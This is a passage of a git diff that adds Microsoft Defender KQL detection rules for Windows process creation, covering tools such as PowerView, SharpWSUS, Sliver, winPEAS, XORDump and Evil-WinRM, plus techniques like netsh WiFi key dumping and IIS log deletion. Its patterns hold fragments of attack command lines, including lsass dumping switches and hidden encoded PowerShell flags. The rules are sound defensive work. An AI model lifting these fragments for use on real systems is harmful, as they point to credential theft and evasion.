ProcessCommandLine contains "Get-NetSubnet" or ProcessCommandLine contains "Get-NetUser" or ProcessCommandLine contains "Get-PathAcl" or ProcessCommandLine contains "Get-PrincipalContext" or ProcessCommandLine contains "Get-RegistryMountedDrive" or ProcessCommandLine contains "Get-RegLoggedOn" or ProcessCommandLine contains "Get-WMIRegCachedRDPConnection" or ProcessCommandLine contains "Get-WMIRegLastLoggedOn" or ProcessCommandLine contains "Get-WMIRegMountedDrive" or ProcessCommandLine contains "Get-WMIRegProxy" or ProcessCommandLine contains "Invoke-ACLScanner" or ProcessCommandLine contains "Invoke-CheckLocalAdminAccess" or ProcessCommandLine contains "Invoke-Kerberoast" or ProcessCommandLine contains "Invoke-MapDomainTrust" or ProcessCommandLine contains "Invoke-RevertToSelf" or ProcessCommandLine contains "Invoke-Sharefinder" or ProcessCommandLine contains "Invoke-UserImpersonation" or ProcessCommandLine contains "Remove-DomainObjectAcl" or ProcessCommandLine contains "Remove-RemoteConnection" or ProcessCommandLine contains "Request-SPNTicket" or ProcessCommandLine contains "Set-DomainObject" or ProcessCommandLine contains "Test-AdminAccess")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_sharpwsus_wsuspendu_execution.kql b/KQL/rules/windows/process_creation/hacktool_sharpwsus_wsuspendu_execution.kql
new file mode 100644
index 00000000..4c431cca
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_sharpwsus_wsuspendu_execution.kql
@@ -0,0 +1,11 @@
+// Title: HackTool - SharpWSUS/WSUSpendu Execution
+// Author: @Kostastsale, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-07
+// Level: high
+// Description: Detects the execution of SharpWSUS or WSUSpendu, utilities that allow for lateral movement through WSUS.
+// Windows Server Update Services (WSUS) is a critical component of Windows systems and is frequently configured in a way that allows an attacker to circumvent internal networking limitations.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.lateral-movement, attack.t1210
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -Inject " and (ProcessCommandLine contains " -PayloadArgs " or ProcessCommandLine contains " -PayloadFile ")) or ((ProcessCommandLine contains " approve " or ProcessCommandLine contains " create " or ProcessCommandLine contains " check " or ProcessCommandLine contains " delete ") and (ProcessCommandLine contains " /payload:" or ProcessCommandLine contains " /payload=" or ProcessCommandLine contains " /updateid:" or ProcessCommandLine contains " /updateid="))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_silenttrinity_stager_execution.kql b/KQL/rules/windows/process_creation/hacktool_silenttrinity_stager_execution.kql
new file mode 100644
index 00000000..a9f6c7d3
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_silenttrinity_stager_execution.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - SILENTTRINITY Stager Execution
+// Author: Aleksey Potapov, oscd.community
+// Date: 2019-10-22
+// Level: high
+// Description: Detects SILENTTRINITY stager use via PE metadata
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1071
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ProcessVersionInfoFileDescription contains "st2stager"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_sliver_c2_implant_activity_pattern.kql b/KQL/rules/windows/process_creation/hacktool_sliver_c2_implant_activity_pattern.kql
new file mode 100644
index 00000000..ed008cb8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_sliver_c2_implant_activity_pattern.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - Sliver C2 Implant Activity Pattern
+// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)
+// Date: 2022-08-25
+// Level: critical
+// Description: Detects process activity patterns as seen being used by Sliver C2 framework implants
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "-NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_soaphound_execution.kql b/KQL/rules/windows/process_creation/hacktool_soaphound_execution.kql
new file mode 100644
index 00000000..f6ad57ad
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_soaphound_execution.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - SOAPHound Execution
+// Author: @kostastsale
+// Date: 2024-01-26
+// Level: high
+// Description: Detects the execution of SOAPHound, a .NET tool for collecting Active Directory data, using specific command-line arguments that may indicate an attempt to extract sensitive AD information.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1087
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " --buildcache " or ProcessCommandLine contains " --bhdump " or ProcessCommandLine contains " --certdump " or ProcessCommandLine contains " --dnsdump ") and (ProcessCommandLine contains " -c " or ProcessCommandLine contains " --cachefilename " or ProcessCommandLine contains " -o " or ProcessCommandLine contains " --outputdirectory")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_stracciatella_execution.kql b/KQL/rules/windows/process_creation/hacktool_stracciatella_execution.kql
new file mode 100644
index 00000000..0375e44c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_stracciatella_execution.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - Stracciatella Execution
+// Author: pH-T (Nextron Systems)
+// Date: 2023-04-17
+// Level: high
+// Description: Detects Stracciatella which executes a Powershell runspace from within C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled based on PE metadata characteristics.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1059, attack.t1562.001
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where FolderPath endswith "\\Stracciatella.exe" or ProcessVersionInfoOriginalFileName =~ "Stracciatella.exe" or ProcessVersionInfoFileDescription =~ "Stracciatella" or (SHA256 startswith "9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956" or SHA256 startswith "fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_trufflesnout_execution.kql b/KQL/rules/windows/process_creation/hacktool_trufflesnout_execution.kql
new file mode 100644
index 00000000..3daaec2e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_trufflesnout_execution.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - TruffleSnout Execution
+// Author: frack113
+// Date: 2022-08-20
+// Level: high
+// Description: Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1482
+
+DeviceProcessEvents
+| where ProcessVersionInfoOriginalFileName =~ "TruffleSnout.exe" or FolderPath endswith "\\TruffleSnout.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_winpeas_execution.kql b/KQL/rules/windows/process_creation/hacktool_winpeas_execution.kql
new file mode 100644
index 00000000..1475f038
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_winpeas_execution.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - winPEAS Execution
+// Author: Georg Lauenstein (sure[secure])
+// Date: 2022-09-19
+// Level: high
+// Description: WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.discovery, attack.t1082, attack.t1087, attack.t1046
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "https://github.com/carlospolop/PEASS-ng/releases/latest/download/" or (ProcessCommandLine contains " applicationsinfo" or ProcessCommandLine contains " browserinfo" or ProcessCommandLine contains " eventsinfo" or ProcessCommandLine contains " fileanalysis" or ProcessCommandLine contains " filesinfo" or ProcessCommandLine contains " processinfo" or ProcessCommandLine contains " servicesinfo" or ProcessCommandLine contains " windowscreds") or (InitiatingProcessCommandLine endswith " -linpeas" or ProcessCommandLine endswith " -linpeas") or (ProcessVersionInfoOriginalFileName =~ "winPEAS.exe" or (FolderPath endswith "\\winPEASany_ofs.exe" or FolderPath endswith "\\winPEASany.exe" or FolderPath endswith "\\winPEASx64_ofs.exe" or FolderPath endswith "\\winPEASx64.exe" or FolderPath endswith "\\winPEASx86_ofs.exe" or FolderPath endswith "\\winPEASx86.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_winpwn_execution.kql b/KQL/rules/windows/process_creation/hacktool_winpwn_execution.kql
new file mode 100644
index 00000000..10e49f69
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_winpwn_execution.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - WinPwn Execution
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2023-12-04
+// Level: high
+// Description: Detects commandline keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.defense-evasion, attack.discovery, attack.execution, attack.privilege-escalation, attack.t1046, attack.t1082, attack.t1106, attack.t1518, attack.t1548.002, attack.t1552.001, attack.t1555, attack.t1555.003
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "Offline_Winpwn" or ProcessCommandLine contains "WinPwn " or ProcessCommandLine contains "WinPwn.exe" or ProcessCommandLine contains "WinPwn.ps1"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_winrm_access_via_evil_winrm.kql b/KQL/rules/windows/process_creation/hacktool_winrm_access_via_evil_winrm.kql
new file mode 100644
index 00000000..3d84e596
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_winrm_access_via_evil_winrm.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - WinRM Access Via Evil-WinRM
+// Author: frack113
+// Date: 2022-01-07
+// Level: medium
+// Description: Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1021.006
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-i " and ProcessCommandLine contains "-u " and ProcessCommandLine contains "-p ") and FolderPath endswith "\\ruby.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_wmiexec_default_powershell_command.kql b/KQL/rules/windows/process_creation/hacktool_wmiexec_default_powershell_command.kql
new file mode 100644
index 00000000..23276ec8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_wmiexec_default_powershell_command.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - Wmiexec Default Powershell Command
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-08
+// Level: high
+// Description: Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.lateral-movement
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "-NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_xordump_execution.kql b/KQL/rules/windows/process_creation/hacktool_xordump_execution.kql
new file mode 100644
index 00000000..959a6a08
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_xordump_execution.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - XORDump Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-01-28
+// Level: high
+// Description: Detects suspicious use of XORDump process memory dumping utility
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036, attack.t1003.001, attack.credential-access
+// False Positives:
+//   - Another tool that uses the command line switches of XORdump
+
+DeviceProcessEvents
+| where FolderPath endswith "\\xordump.exe" or (ProcessCommandLine contains " -process lsass.exe " or ProcessCommandLine contains " -m comsvcs " or ProcessCommandLine contains " -m dbghelp " or ProcessCommandLine contains " -m dbgcore ")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hardware_model_reconnaissance_via_wmic_exe.kql b/KQL/rules/windows/process_creation/hardware_model_reconnaissance_via_wmic_exe.kql
new file mode 100644
index 00000000..6a6dc4e9
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hardware_model_reconnaissance_via_wmic_exe.kql
@@ -0,0 +1,10 @@
+// Title: Hardware Model Reconnaissance Via Wmic.EXE
+// Author: Florian Roth (Nextron Systems)
+// Date: 2023-02-14
+// Level: medium
+// Description: Detects the execution of WMIC with the "csproduct" which is used to obtain information such as hardware models and vendor information
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047, car.2016-03-002
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "csproduct" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/harvesting_of_wifi_credentials_via_netsh_exe.kql b/KQL/rules/windows/process_creation/harvesting_of_wifi_credentials_via_netsh_exe.kql
new file mode 100644
index 00000000..404ff7a2
--- /dev/null
+++ b/KQL/rules/windows/process_creation/harvesting_of_wifi_credentials_via_netsh_exe.kql
@@ -0,0 +1,10 @@
+// Title: Harvesting Of Wifi Credentials Via Netsh.EXE
+// Author: Andreas Hunkeler (@Karneades), oscd.community
+// Date: 2020-04-20
+// Level: medium
+// Description: Detect the harvesting of wifi credentials using netsh.exe
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.credential-access, attack.t1040
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "wlan" and ProcessCommandLine contains " s" and ProcessCommandLine contains " p" and ProcessCommandLine contains " k" and ProcessCommandLine contains "=clear") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hh_exe_execution.kql b/KQL/rules/windows/process_creation/hh_exe_execution.kql
new file mode 100644
index 00000000..98af0a14
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hh_exe_execution.kql
@@ -0,0 +1,12 @@
+// Title: HH.EXE Execution
+// Author: E.M. Anhaus (originally from Atomic Blue Detections, Dan Beavin), oscd.community
+// Date: 2019-10-24
+// Level: low
+// Description: Detects the execution of "hh.exe" to open ".chm" files.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.001
+// False Positives:
+//   - False positives are expected with legitimate ".CHM"
+
+DeviceProcessEvents
+| where ProcessCommandLine contains ".chm" and (ProcessVersionInfoOriginalFileName =~ "HH.exe" or FolderPath endswith "\\hh.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hidden_powershell_in_link_file_pattern.kql b/KQL/rules/windows/process_creation/hidden_powershell_in_link_file_pattern.kql
new file mode 100644
index 00000000..6781bb4a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hidden_powershell_in_link_file_pattern.kql
@@ -0,0 +1,12 @@
+// Title: Hidden Powershell in Link File Pattern
+// Author: frack113
+// Date: 2022-02-06
+// Level: medium
+// Description: Detects events that appear when a user click on a link file with a powershell command in it
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+// False Positives:
+//   - Legitimate commands in .lnk files
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "powershell" and ProcessCommandLine contains ".lnk") and FolderPath =~ "C:\\Windows\\System32\\cmd.exe" and InitiatingProcessFolderPath =~ "C:\\Windows\\explorer.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hiding_files_with_attrib_exe.kql b/KQL/rules/windows/process_creation/hiding_files_with_attrib_exe.kql
new file mode 100644
index 00000000..22143a10
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hiding_files_with_attrib_exe.kql
@@ -0,0 +1,13 @@
+// Title: Hiding Files with Attrib.exe
+// Author: Sami Ruohonen
+// Date: 2019-01-16
+// Level: medium
+// Description: Detects usage of attrib.exe to hide files from users.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.001
+// False Positives:
+//   - IgfxCUIService.exe hiding *.cui files via .bat script (attrib.exe a child of cmd.exe and igfxCUIService.exe is the parent of the cmd.exe)
+//   - Msiexec.exe hiding desktop.ini
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " +h " and (FolderPath endswith "\\attrib.exe" or ProcessVersionInfoOriginalFileName =~ "ATTRIB.EXE")) and (not(ProcessCommandLine contains "\\desktop.ini ")) and (not((ProcessCommandLine =~ "+R +H +S +A \\*.cui" and InitiatingProcessCommandLine =~ "C:\\WINDOWS\\system32\\*.bat" and InitiatingProcessFolderPath endswith "\\cmd.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hiding_user_account_via_specialaccounts_registry_key_commandline.kql b/KQL/rules/windows/process_creation/hiding_user_account_via_specialaccounts_registry_key_commandline.kql
new file mode 100644
index 00000000..d83a052d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hiding_user_account_via_specialaccounts_registry_key_commandline.kql
@@ -0,0 +1,12 @@
+// Title: Hiding User Account Via SpecialAccounts Registry Key - CommandLine
+// Author: @Kostastsale, TheDFIRReport
+// Date: 2022-05-14
+// Level: medium
+// Description: Detects changes to the registry key "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to "0" in order to hide user account from being listed on the logon screen.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.002
+// False Positives:
+//   - System administrator activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList" and ProcessCommandLine contains "add" and ProcessCommandLine contains "/v" and ProcessCommandLine contains "/d 0") and FolderPath endswith "\\reg.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hktl_sharpsuccessor_privilege_escalation_tool_execution.kql b/KQL/rules/windows/process_creation/hktl_sharpsuccessor_privilege_escalation_tool_execution.kql
new file mode 100644
index 00000000..0f9efe77
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hktl_sharpsuccessor_privilege_escalation_tool_execution.kql
@@ -0,0 +1,11 @@
+// Title: HKTL - SharpSuccessor Privilege Escalation Tool Execution
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-06-06
+// Level: high
+// Description: Detects the execution of SharpSuccessor, a tool used to exploit the BadSuccessor attack for privilege escalation in WinServer 2025 Active Directory environments.
+// Successful usage of this tool can let the attackers gain the domain admin privileges by exploiting the BadSuccessor vulnerability.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.t1068
+
+DeviceProcessEvents
+| where FolderPath endswith "\\SharpSuccessor.exe" or ProcessVersionInfoOriginalFileName =~ "SharpSuccessor.exe" or ProcessCommandLine contains "SharpSuccessor" or (ProcessCommandLine contains " add " and ProcessCommandLine contains " /impersonate" and ProcessCommandLine contains " /path" and ProcessCommandLine contains " /account" and ProcessCommandLine contains " /name")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/html_help_hh_exe_suspicious_child_process.kql b/KQL/rules/windows/process_creation/html_help_hh_exe_suspicious_child_process.kql
new file mode 100644
index 00000000..48624a27
--- /dev/null
+++ b/KQL/rules/windows/process_creation/html_help_hh_exe_suspicious_child_process.kql
@@ -0,0 +1,10 @@
+// Title: HTML Help HH.EXE Suspicious Child Process
+// Author: Maxim Pavlunin, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2020-04-01
+// Level: high
+// Description: Detects a suspicious child process of a Microsoft HTML Help (HH.exe)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.initial-access, attack.t1047, attack.t1059.001, attack.t1059.003, attack.t1059.005, attack.t1059.007, attack.t1218, attack.t1218.001, attack.t1218.010, attack.t1218.011, attack.t1566, attack.t1566.001
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\CertReq.exe" or FolderPath endswith "\\CertUtil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\installutil.exe" or FolderPath endswith "\\MSbuild.exe" or FolderPath endswith "\\MSHTA.EXE" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\hh.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols_via_cli.kql b/KQL/rules/windows/process_creation/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols_via_cli.kql
new file mode 100644
index 00000000..56670f14
--- /dev/null
+++ b/KQL/rules/windows/process_creation/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols_via_cli.kql
@@ -0,0 +1,10 @@
+// Title: IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols Via CLI
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-09-05
+// Level: high
+// Description: Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProtocolDefaults" and ProcessCommandLine contains "http" and ProcessCommandLine contains " 0"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/iis_native_code_module_command_line_installation.kql b/KQL/rules/windows/process_creation/iis_native_code_module_command_line_installation.kql
new file mode 100644
index 00000000..87505a48
--- /dev/null
+++ b/KQL/rules/windows/process_creation/iis_native_code_module_command_line_installation.kql
@@ -0,0 +1,12 @@
+// Title: IIS Native-Code Module Command Line Installation
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-12-11
+// Level: medium
+// Description: Detects suspicious IIS native-code module installations via command line
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1505.003
+// False Positives:
+//   - Unknown as it may vary from organisation to organisation how admins use to install IIS modules
+
+DeviceProcessEvents
+| where (((ProcessCommandLine contains "install" and ProcessCommandLine contains "module") and (ProcessCommandLine contains "-name:" or ProcessCommandLine contains "/name:" or ProcessCommandLine contains "–name:" or ProcessCommandLine contains "—name:" or ProcessCommandLine contains "―name:")) and (FolderPath endswith "\\appcmd.exe" or ProcessVersionInfoOriginalFileName =~ "appcmd.exe")) and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\inetsrv\\iissetup.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/iis_webserver_log_deletion_via_commandline_utilities.kql b/KQL/rules/windows/process_creation/iis_webserver_log_deletion_via_commandline_utilities.kql
new file mode 100644
index 00000000..56c833c8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/iis_webserver_log_deletion_via_commandline_utilities.kql
@@ -0,0 +1,14 @@
+// Title: IIS WebServer Log Deletion via CommandLine Utilities
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-09-02
+// Level: medium
+// Description: Detects attempts to delete Internet Information Services (IIS) log files via command line utilities, which is a common defense evasion technique used by attackers to cover their tracks.
+// Threat actors often abuse vulnerabilities in web applications hosted on IIS servers to gain initial access and later delete IIS logs to evade detection.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070
+// False Positives:
+//   - Deletion of IIS logs that are older than a certain retention period as part of regular maintenance activities.
+//   - Legitimate schedule tasks or scripts that clean up log files regularly.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "del " or ProcessCommandLine contains "erase " or ProcessCommandLine contains "rm " or ProcessCommandLine contains "remove-item " or ProcessCommandLine contains "rmdir ") and ProcessCommandLine contains "\\inetpub\\logs\\" and ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("cmd.exe", "powershell.exe", "powershell_ise.exe", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/imagingdevices_unusual_parent_child_processes.kql b/KQL/rules/windows/process_creation/imagingdevices_unusual_parent_child_processes.kql
new file mode 100644
index 00000000..eb1ce306
--- /dev/null
+++ b/KQL/rules/windows/process_creation/imagingdevices_unusual_parent_child_processes.kql
@@ -0,0 +1,10 @@
+// Title: ImagingDevices Unusual Parent/Child Processes
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-27
+// Level: high
+// Description: Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\ImagingDevices.exe" or (FolderPath endswith "\\ImagingDevices.exe" and (InitiatingProcessFolderPath endswith "\\WmiPrvSE.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe" or InitiatingProcessFolderPath endswith "\\dllhost.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/import_ldap_data_interchange_format_file_via_ldifde_exe.kql b/KQL/rules/windows/process_creation/import_ldap_data_interchange_format_file_via_ldifde_exe.kql
new file mode 100644
index 00000000..6b4d70a8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/import_ldap_data_interchange_format_file_via_ldifde_exe.kql
@@ -0,0 +1,12 @@
+// Title: Import LDAP Data Interchange Format File Via Ldifde.EXE
+// Author: @gott_cyber
+// Date: 2022-09-02
+// Level: medium
+// Description: Detects the execution of "Ldifde.exe" with the import flag "-i". The can be abused to include HTTP-based arguments which will allow the arbitrary download of files from a remote server.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.defense-evasion, attack.t1218, attack.t1105
+// False Positives:
+//   - Since the content of the files are unknown, false positives are expected
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-i" and ProcessCommandLine contains "-f") and (FolderPath endswith "\\ldifde.exe" or ProcessVersionInfoOriginalFileName =~ "ldifde.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/import_powershell_modules_from_suspicious_directories_proccreation.kql b/KQL/rules/windows/process_creation/import_powershell_modules_from_suspicious_directories_proccreation.kql
new file mode 100644
index 00000000..eb08253e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/import_powershell_modules_from_suspicious_directories_proccreation.kql
@@ -0,0 +1,10 @@
+// Title: Import PowerShell Modules From Suspicious Directories - ProcCreation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-10
+// Level: medium
+// Description: Detects powershell scripts that import modules from suspicious directories
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "Import-Module \"$Env:Temp\\" or ProcessCommandLine contains "Import-Module '$Env:Temp\\" or ProcessCommandLine contains "Import-Module $Env:Temp\\" or ProcessCommandLine contains "Import-Module \"$Env:Appdata\\" or ProcessCommandLine contains "Import-Module '$Env:Appdata\\" or ProcessCommandLine contains "Import-Module $Env:Appdata\\" or ProcessCommandLine contains "Import-Module C:\\Users\\Public\\" or ProcessCommandLine contains "ipmo \"$Env:Temp\\" or ProcessCommandLine contains "ipmo '$Env:Temp\\" or ProcessCommandLine contains "ipmo $Env:Temp\\" or ProcessCommandLine contains "ipmo \"$Env:Appdata\\" or ProcessCommandLine contains "ipmo '$Env:Appdata\\" or ProcessCommandLine contains "ipmo $Env:Appdata\\" or ProcessCommandLine contains "ipmo C:\\Users\\Public\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/imports_registry_key_from_a_file.kql b/KQL/rules/windows/process_creation/imports_registry_key_from_a_file.kql
new file mode 100644
index 00000000..a0e79b65
--- /dev/null
+++ b/KQL/rules/windows/process_creation/imports_registry_key_from_a_file.kql
@@ -0,0 +1,13 @@
+// Title: Imports Registry Key From a File
+// Author: Oddvar Moe, Sander Wiebing, oscd.community
+// Date: 2020-10-07
+// Level: medium
+// Description: Detects the import of the specified file to the registry with regedit.exe.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1112, attack.defense-evasion
+// False Positives:
+//   - Legitimate import of keys
+//   - Evernote
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " /i " or ProcessCommandLine contains " /s " or ProcessCommandLine contains ".reg") and (FolderPath endswith "\\regedit.exe" or ProcessVersionInfoOriginalFileName =~ "REGEDIT.EXE")) and (not(((ProcessCommandLine contains " -e " or ProcessCommandLine contains " /e " or ProcessCommandLine contains " –e " or ProcessCommandLine contains " —e " or ProcessCommandLine contains " ―e " or ProcessCommandLine contains " -a " or ProcessCommandLine contains " /a " or ProcessCommandLine contains " –a " or ProcessCommandLine contains " —a " or ProcessCommandLine contains " ―a " or ProcessCommandLine contains " -c " or ProcessCommandLine contains " /c " or ProcessCommandLine contains " –c " or ProcessCommandLine contains " —c " or ProcessCommandLine contains " ―c ") and ProcessCommandLine matches regex ":[^ \\\\]")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/imports_registry_key_from_an_ads.kql b/KQL/rules/windows/process_creation/imports_registry_key_from_an_ads.kql
new file mode 100644
index 00000000..09572d16
--- /dev/null
+++ b/KQL/rules/windows/process_creation/imports_registry_key_from_an_ads.kql
